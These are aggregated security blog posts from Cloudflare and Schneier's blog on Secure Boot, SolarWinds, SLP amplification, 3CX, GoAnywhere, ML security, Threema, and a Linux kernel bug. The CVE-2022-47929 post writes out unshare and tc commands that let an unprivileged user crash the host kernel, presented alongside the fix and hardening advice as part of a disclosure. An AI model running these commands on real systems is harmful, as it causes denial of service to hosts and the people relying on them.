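// the first n bytes of buf, returning (taken, rest), or an error if the
// buffer is too short.
fn consume(buf: &[u8], n: usize) -> Result<(&[u8], &[u8]), &'static str> {
    if buf.len() < n {
        return Err("unexpected end of input");
    }
    Ok(buf.split_at(n))
}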

Conclusion

Customers using Cloudflare Images or Image Resizing products are protected against the aCropalypse vulnerability. The Images team addressed the vulnerability in a way that didn’t require any changes to the original images or cause any increased latency or regressions for customers.

Microsoft Secure Boot Bug

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/05/microsoft-secure-boot-bug.html

Microsoft is currently patching a zero-day Secure-Boot bug.

The BlackLotus bootkit is the first-known real-world malware that can bypass Secure Boot protections, allowing for the execution of malicious code before your PC begins loading Windows and its many security protections. Secure Boot has been enabled by default for over a decade on most Windows PCs sold by companies like Dell, Lenovo, HP, Acer, and others. PCs running Windows 11 must have it enabled to meet the software’s system requirements.

Microsoft says that the vulnerability can be exploited by an attacker with either physical access to a system or administrator rights on a system. It can affect physical PCs and virtual machines with Secure Boot enabled.

That’s important. This is a nasty vulnerability, but it takes some work to exploit it.

The problem with the patch is that it breaks backwards compatibility: “…once the fixes have been enabled, your PC will no longer be able to boot from older bootable media that doesn’t include the fixes.”

And:

Not wanting to suddenly render any users’ systems unbootable, Microsoft will be rolling the update out in phases over the next few months. The initial version of the patch requires substantial user intervention to enable—you first need to install May’s security updates, then use a five-step process to manually apply and verify a pair of “revocation files” that update your system’s hidden EFI boot partition and your registry. These will make it so that older, vulnerable versions of the bootloader will no longer be trusted by PCs.

A second update will follow in July that won’t enable the patch by default but will make it easier to enable. A third update in “first quarter 2024” will enable the fix by default and render older boot media unbootable on all patched Windows PCs. Microsoft says it is “looking for opportunities to accelerate this schedule,” though it’s unclear what that would entail.

So it’ll be almost a year before this is completely fixed.

SolarWinds Detected Six Months Earlier

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/05/solarwinds-detected-six-months-earlier.html

New reporting from Wired reveals that the Department of Justice detected the SolarWinds attack six months before Mandiant detected it in December 2020, but didn’t realize what it detected—and so ignored it.

WIRED can now confirm that the operation was actually discovered by the DOJ six months earlier, in late May 2020­—but the scale and significance of the breach wasn’t immediately apparent. Suspicions were triggered when the department detected unusual traffic emanating from one of its servers that was running a trial version of the Orion software suite made by SolarWinds, according to sources familiar with the incident. The software, used by system administrators to manage and configure networks, was communicating externally with an unfamiliar system on the internet. The DOJ asked the security firm Mandiant to help determine whether the server had been hacked. It also engaged Microsoft, though it’s not clear why the software maker was also brought onto the investigation.

[…]

Investigators suspected the hackers had breached the DOJ server directly, possibly by exploiting a vulnerability in the Orion software. They reached out to SolarWinds to assist with the inquiry, but the company’s engineers were unable to find a vulnerability in their code. In July 2020, with the mystery still unresolved, communication between investigators and SolarWinds stopped. A month later, the DOJ purchased the Orion system, suggesting that the department was satisfied that there was no further threat posed by the Orion suite, the sources say.

EDITED TO ADD (5/4): More details about the SolarWinds attack from Wired.com.

SLP: a new DDoS amplification vector in the wild

Post Syndicated from Alex Forster original https://blog.cloudflare.com/slp-new-ddos-amplification-vector/

Earlier today, April 25, 2023, researchers Pedro Umbelino at Bitsight and Marco Lux at Curesec published their discovery of CVE-2023-29552, a new DDoS reflection/amplification attack vector leveraging the SLP protocol. If you are a Cloudflare customer, your services are already protected from this new attack vector.

Service Location Protocol (SLP) is a “service discovery” protocol invented by Sun Microsystems in 1997. Like other service discovery protocols, it was designed to allow devices in a local area network to interact without prior knowledge of each other. SLP is a relatively obsolete protocol and has mostly been supplanted by more modern alternatives like UPnP, mDNS/Zeroconf, and WS-Discovery. Nevertheless, many commercial products still offer support for SLP.

Since SLP has no method for authentication, it should never be exposed to the public Internet. However, Umbelino and Lux have discovered that upwards of 35,000 Internet endpoints have their devices’ SLP service exposed and accessible to anyone. Additionally, they have discovered that the UDP version of this protocol has an amplification factor of up to 2,200x, which is the third largest discovered to-date.

Cloudflare expects the prevalence of SLP-based DDoS attacks to rise significantly in the coming weeks as malicious actors learn how to exploit this newly discovered attack vector.

Cloudflare customers are protected

If you are a Cloudflare customer, our automated DDoS protection system already protects your services from these SLP amplification attacks.

If you are a network operator, you should ensure that you are not exposing the SLP protocol directly to the public Internet, to avoid being exploited to launch these attacks. You should consider blocking UDP port 427 via access control lists or other means. This port is rarely used on the public Internet, meaning it is relatively safe to block without impacting legitimate traffic. Cloudflare Magic Transit customers can use the Magic Firewall to craft and deploy such rules.

North Korea Hacking Cryptocurrency Sites with 3CX Exploit

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/04/north-korea-hacking-cryptocurrency-sites-with-3cx-exploit.html

News:

Researchers at Russian cybersecurity firm Kaspersky today revealed that they identified a small number of cryptocurrency-focused firms as at least some of the victims of the 3CX software supply-chain attack that’s unfolded over the past week. Kaspersky declined to name any of those victim companies, but it notes that they’re based in “western Asia.”

Security firms CrowdStrike and SentinelOne last week pinned the operation on North Korean hackers, who compromised 3CX installer software that’s used by 600,000 organizations worldwide, according to the vendor. Despite the potentially massive breadth of that attack, which SentinelOne dubbed “Smooth Operator,” Kaspersky has now found that the hackers combed through the victims infected with its corrupted software to ultimately target fewer than 10 machines­—at least as far as Kaspersky could observe so far—­and that they seemed to be focusing on cryptocurrency firms with “surgical precision.”

Mass Ransomware Attack

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/03/mass-ransomware-attack.html

A vulnerability in a popular data transfer tool has resulted in a mass ransomware attack:

TechCrunch has learned of dozens of organizations that used the affected GoAnywhere file transfer software at the time of the ransomware attack, suggesting more victims are likely to come forward.

However, while the number of victims of the mass-hack is widening, the known impact is murky at best.

Since the attack in late January or early February—the exact date is not known—Clop has disclosed less than half of the 130 organizations it claimed to have compromised via GoAnywhere, a system that can be hosted in the cloud or on an organization’s network that allows companies to securely transfer huge sets of data and other large files.

Attacking Machine Learning Systems

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/02/attacking-machine-learning-systems.html

The field of machine learning (ML) security—and corresponding adversarial ML—is rapidly advancing as researchers develop sophisticated techniques to perturb, disrupt, or steal the ML model or data. It’s a heady time; because we know so little about the security of these systems, there are many opportunities for new researchers to publish in this field. In many ways, this circumstance reminds me of the cryptanalysis field in the 1990s. And there is a lesson in that similarity: the complex mathematical attacks make for good academic papers, but we mustn’t lose sight of the fact that insecure software will be the likely attack vector for most ML systems.

We are amazed by real-world demonstrations of adversarial attacks on ML systems, such as a 3D-printed object that looks like a turtle but is recognized (from any orientation) by the ML system as a gun. Or adding a few stickers that look like smudges to a stop sign so that it is recognized by a state-of-the-art system as a 45 mi/h speed limit sign. But what if, instead, somebody hacked into the system and just switched the labels for “gun” and “turtle” or swapped “stop” and “45 mi/h”? Systems can only match images with human-provided labels, so the software would never notice the switch. That is far easier and will remain a problem even if systems are developed that are robust to those adversarial attacks.

At their core, modern ML systems have complex mathematical models that use training data to become competent at a task. And while there are new risks inherent in the ML model, all of that complexity still runs in software. Training data are still stored in memory somewhere. And all of that is on a computer, on a network, and attached to the Internet. Like everything else, these systems will be hacked through vulnerabilities in those more conventional parts of the system.

This shouldn’t come as a surprise to anyone who has been working with Internet security. Cryptography has similar vulnerabilities. There is a robust field of cryptanalysis: the mathematics of code breaking. Over the last few decades, we in the academic world have developed a variety of cryptanalytic techniques. We have broken ciphers we previously thought secure. This research has, in turn, informed the design of cryptographic algorithms. The classified world of the NSA and its foreign counterparts have been doing the same thing for far longer. But aside from some special cases and unique circumstances, that’s not how encryption systems are exploited in practice. Outside of academic papers, cryptosystems are largely bypassed because everything around the cryptography is much less secure.

I wrote this in my book, Data and Goliath:

The problem is that encryption is just a bunch of math, and math has no agency. To turn that encryption math into something that can actually provide some security for you, it has to be written in computer code. And that code needs to run on a computer: one with hardware, an operating system, and other software. And that computer needs to be operated by a person and be on a network. All of those things will invariably introduce vulnerabilities that undermine the perfection of the mathematics…

This remains true even for pretty weak cryptography. It is much easier to find an exploitable software vulnerability than it is to find a cryptographic weakness. Even cryptographic algorithms that we in the academic community regard as “broken”—meaning there are attacks that are more efficient than brute force—are usable in the real world because the difficulty of breaking the mathematics repeatedly and at scale is much greater than the difficulty of breaking the computer system that the math is running on.

ML systems are similar. Systems that are vulnerable to model stealing through the careful construction of queries are more vulnerable to model stealing by hacking into the computers they’re stored in. Systems that are vulnerable to model inversion—this is where attackers recover the training data through carefully constructed queries—are much more vulnerable to attacks that take advantage of unpatched vulnerabilities.

But while security is only as strong as the weakest link, this doesn’t mean we can ignore either cryptography or ML security. Here, our experience with cryptography can serve as a guide. Cryptographic attacks have different characteristics than software and network attacks, something largely shared with ML attacks. Cryptographic attacks can be passive. That is, attackers who can recover the plaintext from nothing other than the ciphertext can eavesdrop on the communications channel, collect all of the encrypted traffic, and decrypt it on their own systems at their own pace, perhaps in a giant server farm in Utah. This is bulk surveillance and can easily operate on this massive scale.

On the other hand, computer hacking has to be conducted one target computer at a time. Sure, you can develop tools that can be used again and again. But you still need the time and expertise to deploy those tools against your targets, and you have to do so individually. This means that any attacker has to prioritize. So while the NSA has the expertise necessary to hack into everyone’s computer, it doesn’t have the budget to do so. Most of us are simply too low on its priorities list to ever get hacked. And that’s the real point of strong cryptography: it forces attackers like the NSA to prioritize.

This analogy only goes so far. ML is not anywhere near as mathematically sound as cryptography. Right now, it is a sloppy misunderstood mess: hack after hack, kludge after kludge, built on top of each other with some data dependency thrown in. Directly attacking an ML system with a model inversion attack or a perturbation attack isn’t as passive as eavesdropping on an encrypted communications channel, but it’s using the ML system as intended, albeit for unintended purposes. It’s much safer than actively hacking the network and the computer that the ML system is running on. And while it doesn’t scale as well as cryptanalytic attacks can—and there likely will be a far greater variety of ML systems than encryption algorithms—it has the potential to scale better than one-at-a-time computer hacking does. So here again, good ML security denies attackers all of those attack vectors.

We’re still in the early days of studying ML security, and we don’t yet know the contours of ML security techniques. There are really smart people working on this and making impressive progress, and it’ll be years before we fully understand it. Attacks come easy, and defensive techniques are regularly broken soon after they’re made public. It was the same with cryptography in the 1990s, but eventually the science settled down as people better understood the interplay between attack and defense. So while Google, Amazon, Microsoft, and Tesla have all faced adversarial ML attacks on their production systems in the last three years, that’s not going to be the norm going forward.

All of this also means that our security for ML systems depends largely on the same conventional computer security techniques we’ve been using for decades. This includes writing vulnerability-free software, designing user interfaces that help resist social engineering, and building computer networks that aren’t full of holes. It’s the same risk-mitigation techniques that we’ve been living with for decades. That we’re still mediocre at it is cause for concern, with regard to both ML systems and computing in general.

I love cryptography and cryptanalysis. I love the elegance of the mathematics and the thrill of discovering a flaw—or even of reading and understanding a flaw that someone else discovered—in the mathematics. It feels like security in its purest form. Similarly, I am starting to love adversarial ML and ML security, and its tricks and techniques, for the same reasons.

I am not advocating that we stop developing new adversarial ML attacks. It teaches us about the systems being attacked and how they actually work. They are, in a sense, mechanisms for algorithmic understandability. Building secure ML systems is important research and something we in the security community should continue to do.

There is no such thing as a pure ML system. Every ML system is a hybrid of ML software and traditional software. And while ML systems bring new risks that we haven’t previously encountered, we need to recognize that the majority of attacks against these systems aren’t going to target the ML part. Security is only as strong as the weakest link. As bad as ML security is right now, it will improve as the science improves. And from then on, as in cryptography, the weakest link will be in the software surrounding the ML system.

This essay originally appeared in the May 2020 issue of IEEE Computer. I forgot to reprint it here.

CVE-2022-47929: traffic control noqueue no problem?

Post Syndicated from Frederick Lawler original https://blog.cloudflare.com/cve-2022-47929-traffic-control-noqueue-no-problem/

USER namespaces power the functionality of our favorite tools such as docker, podman, and kubernetes. We wrote about Linux namespaces back in June and explained them like this:

Most of the namespaces are uncontroversial, like the UTS namespace which allows the host system to hide its hostname and time. Others are complex but straightforward – NET and NS (mount) namespaces are known to be hard to wrap your head around. Finally, there is this very special, very curious USER namespace. USER namespace is special since it allows the – typically unprivileged owner to operate as “root” inside it. It’s a foundation to having tools like Docker to not operate as true root, and things like rootless containers.

Due to its nature, allowing unprivileged users access to USER namespaces has always carried a great security risk. With its help, an unprivileged user can in fact run code that typically requires root. This code is often under-tested and buggy. Today we will look into one such case, where USER namespaces are leveraged to exploit a kernel bug that can result in an unprivileged denial of service attack.

Enter Linux Traffic Control queue disciplines

In 2019, we were exploring leveraging Linux Traffic Control’s queue discipline (qdisc) to schedule packets for one of our services with the Hierarchy Token Bucket (HTB) classful qdisc strategy. Linux Traffic Control is a user-configured system to schedule and filter network packets. Queue disciplines are the strategies in which packets are scheduled. In particular, we wanted to filter and schedule certain packets from an interface, and drop others into the noqueue qdisc.

noqueue is a special case qdisc, such that packets are supposed to be dropped when scheduled into it. In practice, this is not the case. Linux handles noqueue such that packets are passed through and not dropped (for the most part). The documentation states as much. It also states that “It is not possible to assign the noqueue queuing discipline to physical devices or classes.” So what happens when we assign noqueue to a class?

Let’s write some shell commands to show the problem in action:

1. $ sudo -i
2. # dev=enp0s5
3. # tc qdisc replace dev $dev root handle 1: htb default 1
4. # tc class add dev $dev parent 1: classid 1:1 htb rate 10mbit
5. # tc qdisc add dev $dev parent 1:1 handle 10: noqueue

  1. First we need to log in as root because that gives us CAP_NET_ADMIN to be able to configure traffic control.
  2. We then assign a network interface to a variable. These can be found with ip a. Virtual interfaces can be located by calling ls /sys/devices/virtual/net. These will match with the output from ip a.
  3. Our interface is currently assigned to the pfifo_fast qdisc, so we replace it with the HTB classful qdisc and assign it the handle of 1:. We can think of this as the root node in a tree. The “default 1” configures this such that unclassified traffic will be routed directly through this qdisc which falls back to pfifo_fast queuing. (more on this later)
  4. Next we add a class to our root qdisc 1:, assign it to the first leaf node 1 of root 1: 1:1, and give it some reasonable configuration defaults.
  5. Lastly, we add the noqueue qdisc to our first leaf node in the hierarchy: 1:1. This effectively means traffic routed here will be scheduled to noqueue.

Assuming our setup executed without a hitch, we will receive something similar to this kernel panic:

BUG: kernel NULL pointer dereference, address: 0000000000000000
#PF: supervisor instruction fetch in kernel mode
...
Call Trace:
<TASK>
htb_enqueue+0x1c8/0x370
dev_qdisc_enqueue+0x15/0x90
__dev_queue_xmit+0x798/0xd00
...
</TASK>

We know that the root user is responsible for setting qdisc on interfaces, so if root can crash the kernel, so what? We just do not apply noqueue qdisc to a class id of a HTB qdisc:

# dev=enp0s5
# tc qdisc replace dev $dev root handle 1: htb default 1
# tc class add dev $dev parent 1: classid 1:2 htb rate 10mbit // A
// B is missing, so anything not filtered into 1:2 will be pfifo_fast

Here, we leveraged the default case of HTB where we assign a class id 1:2 to be rate-limited (A), and implicitly did not set a qdisc to another class such as id 1:1 (B). Packets queued to (A) will be filtered to HTB_DIRECT and packets queued to (B) will be filtered into pfifo_fast.

Because we were not familiar with this part of the codebase, we notified the mailing lists and created a ticket. The bug did not seem all that important to us at that time.

Fast-forward to 2022, we are pushing USER namespace creation hardening. We extended the Linux LSM framework with a new LSM hook: userns_create to leverage eBPF LSM for our protections, and encourage others to do so as well. Recently while combing our ticket backlog, we rethought this bug. We asked ourselves, “can we leverage USER namespaces to trigger the bug?” and the short answer is yes!

Demonstrating the bug

The exploit can be performed with any classful qdisc that assumes a struct Qdisc.enqueue function to not be NULL (more on this later), but in this case, we are demonstrating just with HTB.

$ unshare -rU --net
$ dev=lo
$ tc qdisc replace dev $dev root handle 1: htb default 1
$ tc class add dev $dev parent 1: classid 1:1 htb rate 10mbit
$ tc qdisc add dev $dev parent 1:1 handle 10: noqueue
$ ping -I $dev -w 1 -c 1 1.1.1.1

We use the “lo” interface to demonstrate that this bug is triggerable with a virtual interface. This is important for containers because they are fed virtual interfaces most of the time, and not the physical interface. Because of that, we can use a container to crash the host as an unprivileged user, and thus perform a denial of service attack.

Why does that work?

To understand the problem a bit better, we need to look back to the original patch series, but specifically this commit that introduced the bug. Before this series, achieving noqueue on interfaces relied on a hack that would set a device qdisc to noqueue if the device had a tx_queue_len = 0. The commit d66d6c3152e8 (“net: sched: register noqueue qdisc”) circumvents this by explicitly allowing noqueue to be added with the tc command without needing to get around that limitation.

The way the kernel checks whether we are in a noqueue case is to simply check if a qdisc has a NULL enqueue() function. Recall from earlier that noqueue does not necessarily drop packets in practice? After that check, in the fail case, the following logic handles the noqueue functionality. In order to fail the check, the author had to cheat by reassigning enqueue from noop_enqueue() to NULL in the qdisc's init function, which is called well after register_qdisc() at runtime.

Here is where classful qdiscs come into play. In this call path, the enqueue function is no longer NULL: it is now set to HTB's (in our example), which is thus allowed to enqueue the struct skb to a queue by making a call to htb_enqueue(). Once in there, HTB performs a lookup to pull in the qdisc assigned to a leaf node, and eventually attempts to queue the struct skb to the chosen qdisc, which ultimately reaches this function:

include/net/sch_generic.h

static inline int qdisc_enqueue(struct sk_buff *skb, struct Qdisc *sch,
				struct sk_buff **to_free)
{
	qdisc_calculate_pkt_len(skb, sch);
	return sch->enqueue(skb, sch, to_free); // sch->enqueue == NULL
}

We can see that the enqueueing process is fairly agnostic to physical versus virtual interfaces. The permissions and validation checks are done when adding a queue to an interface, which is why the classful qdiscs assume the queue to not be NULL. This knowledge leads us to a few solutions to consider.

Solutions

We had a few solutions ranging from what we thought was best to worst:

  1. Follow tc-noqueue documentation and do not allow noqueue to be assigned to a classful qdisc
  2. Instead of checking for NULL, check for struct noqueue_qdisc_ops, and reset noqueue back to noop_enqueue
  3. For each classful qdisc, check for NULL and fallback

While we ultimately went for the first option, “disallow noqueue for qdisc classes”, the third option creates a lot of churn in the code and does not solve the problem completely: future qdisc implementations could forget that important check, and so could maintainers. However, the reason for passing on the second option is a bit more interesting.

The reason we did not follow that approach is that we first need to answer these questions:

Why not allow noqueue for classful qdiscs?

This contradicts the documentation. The documentation does have some precedent for not being totally followed in practice, but we will need to update that to reflect the current state. This is fine to do, but does not address the behavior change problem other than remove the NULL dereference bug.

What behavior changes if we do allow noqueue for qdiscs?

This is harder to answer because we need to determine what that behavior should be. Currently, when noqueue is applied as the root qdisc for an interface, the path is to essentially allow packets to be processed. Claiming a fallback for classes is a different matter. They may each have their own fallback rules, and how do we know what is the right fallback? Sometimes in HTB the fallback is pass-through with HTB_DIRECT, sometimes it is pfifo_fast. What about the other classes? Perhaps instead we should fall back to the default noqueue behavior as it is for root qdiscs?

We felt that going down this route would only add confusion and additional complexity to queuing. We could also make an argument that such a change could be considered a feature addition and not necessarily a bug fix. Suffice it to say, adhering to the current documentation seems to be the more appealing approach to prevent the vulnerability now, while something else can be worked out later.

Takeaways

First and foremost, apply this patch as soon as possible. And consider hardening USER namespaces on your systems by setting sysctl -w kernel.unprivileged_userns_clone=0, which only lets root create USER namespaces in Debian kernels, or sysctl -w user.max_user_namespaces=[number] for a process hierarchy, or consider backporting these two patches: security_create_user_ns() and the SELinux implementation (now in Linux 6.1.x), which allow you to protect your systems with either eBPF or SELinux. If you are sure you’re not using USER namespaces, in extreme cases you might consider turning the feature off with CONFIG_USERNS=n. This is just one example of many where namespaces are leveraged to perform an attack, and more are sure to crop up at varying levels of severity in the future.

Special thanks to Ignat Korchagin and Jakub Sitnicki for code reviews and helping demonstrate the bug in practice.

Security Analysis of Threema

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/01/security-analysis-of-threema.html

A group of Swiss researchers have published an impressive security analysis of Threema.

We provide an extensive cryptographic analysis of Threema, a Swiss-based encrypted messaging application with more than 10 million users and 7000 corporate customers. We present seven different attacks against the protocol in three different threat models. As one example, we present a cross-protocol attack which breaks authentication in Threema and which exploits the lack of proper key separation between different sub-protocols. As another, we demonstrate a compression-based side-channel attack that recovers users’ long-term private keys through observation of the size of Threema encrypted back-ups. We discuss remediations for our attacks and draw three wider lessons for developers of secure protocols.

From a news article:

Threema has more than 10 million users, which include the Swiss government, the Swiss army, German Chancellor Olaf Scholz, and other politicians in that country. Threema developers advertise it as a more secure alternative to Meta’s WhatsApp messenger. It’s among the top Android apps for a fee-based category in Switzerland, Germany, Austria, Canada, and Australia. The app uses a custom-designed encryption protocol in contravention of established cryptographic norms.

The company is performing the usual denials and deflections:

In a web post, Threema officials said the vulnerabilities applied to an old protocol that’s no longer in use. It also said the researchers were overselling their findings.

“While some of the findings presented in the paper may be interesting from a theoretical standpoint, none of them ever had any considerable real-world impact,” the post stated. “Most assume extensive and unrealistic prerequisites that would have far greater consequences than the respective finding itself.”

Left out of the statement is that the protocol the researchers analyzed is old because they disclosed the vulnerabilities to Threema, and Threema updated it.